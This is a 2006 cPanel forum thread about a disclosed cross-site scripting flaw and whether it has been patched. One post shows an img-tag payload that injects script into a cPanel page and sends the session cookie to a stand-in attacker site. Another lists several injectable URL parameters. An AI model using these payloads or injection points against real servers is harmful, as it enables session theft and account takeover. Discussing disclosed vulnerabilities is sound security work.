The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Cross Site Scripting

Discussion in 'General Discussion' started by astopy, Feb 3, 2006.

  1. astopy

    astopy Well-Known Member

    Joined:
    Apr 3, 2003
    Messages:
    165
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    From BugTraq:
    Has a fix for this been released?
     
  2. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    this was published yesterday
     
  3. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Read the advisory - seems like a rather minor bug considering you have to authenticate to get into your cPanel account to achieve this anyway.
     
  4. astopy

    astopy Well-Known Member

    Joined:
    Apr 3, 2003
    Messages:
    165
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    I didn't say it was a major bug, was just wondering if it'd been fixed.
     
  5. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Since there have been no changes to the cPanel versions or the changelog, I would guess not.
     
  6. anup123

    anup123 Well-Known Member

    Joined:
    Mar 29, 2004
    Messages:
    897
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    This Planet
    Oh i thought security vulnerabilities were not to be posted on forums or bugzilla. cPanel didn't like it. Or is that rule only fopr a select few? This was published on 3rd Feb 2k6 anyway on secunia

    In fact there are 6 odd reported today.

    Anup
     
    #6 anup123, Feb 6, 2006
    Last edited: Feb 6, 2006
  7. jwiens

    jwiens Member

    Joined:
    Mar 8, 2004
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    XSS is a big deal. The big deal is not that you can get javascript to popup once you've authenticated, it's that once you've authenticated, if I can get you to visit my site, I can steal your cpsession cookie and become you without a password or even a username. Incidentally, cpanel should tie an IP address to a cpsession cookie. That way if the cookie is stolen, it could only be abused from the same IP address. However, I just tested accessing my cpanel with a stolen cookie from a different address and it unfortunately works fine.

    To see what I mean, consider the following:

    Alice logs in to her cpanel to do maintenance, not logging out or closing her browser.
    Some time later she visits a blog she regularly reads written by Eve who knows that Alice uses cpanel. Eve embeds the following img on her page:
    Code:
    <img width=1 height=1 src="http://site-of-alices-cpanel:2082/frontend/xcontroller/editquota.html?email=<script>//JAVASCRIPT CODE TO TAKE CPSESSION COOKIE AND VISIT http://evesites/evilscript?stolencookie=$cpsession//</script>&domain=">
    
    Since the javascript code runs locally on site-of-alices-cpanel, it has full access to steal the cpsession cookie and send it any way it likes back to Eve's server. I omitted the javascript code since 1) it's trivially easy to write, and 2) I don't feel like enabling those who need point and click exploits. But suffice to say, all it takes is for Eve to now surf to http://site-of-alices-cpanel:2082/ with cpsession set to the cookie value she just stole and she has full access to Alice's cpanel.

    So yeah, this is relatively serious.
     
  8. jwiens

    jwiens Member

    Joined:
    Mar 8, 2004
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    Incidentally, it looks like there are two different groups announcing vulnerabilities:

    Code:
    http://victim:2082/frontend/xcontroller/editquota.html?email=/code/&domain
    http://victim:2082/frontend/xcontroller/dodelpop.html?email=/code/&domain=xxx
    http://victim:2082/frontend/xcontroller/diskusage.html?showtree=/code/
    http://victim:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=/code/
    http://victim:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=/code/
    http://victim:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=/code/&domain=xxx&target=xxx
    http://victim:2082/frontend/xcontroller/stats/detailbw.html?mon=/code/&year=2006&domain=xxx&target=xxx
    And also:
    Code:
    http://victim:2095/webmailaging.cgi?numdays=/code/&ageaction=change
    I haven't verified them all, but tested the first few on an updated stable cpanel system and they did work.
     
    #8 jwiens, Feb 7, 2006
    Last edited: Feb 7, 2006
Loading...

Share This Page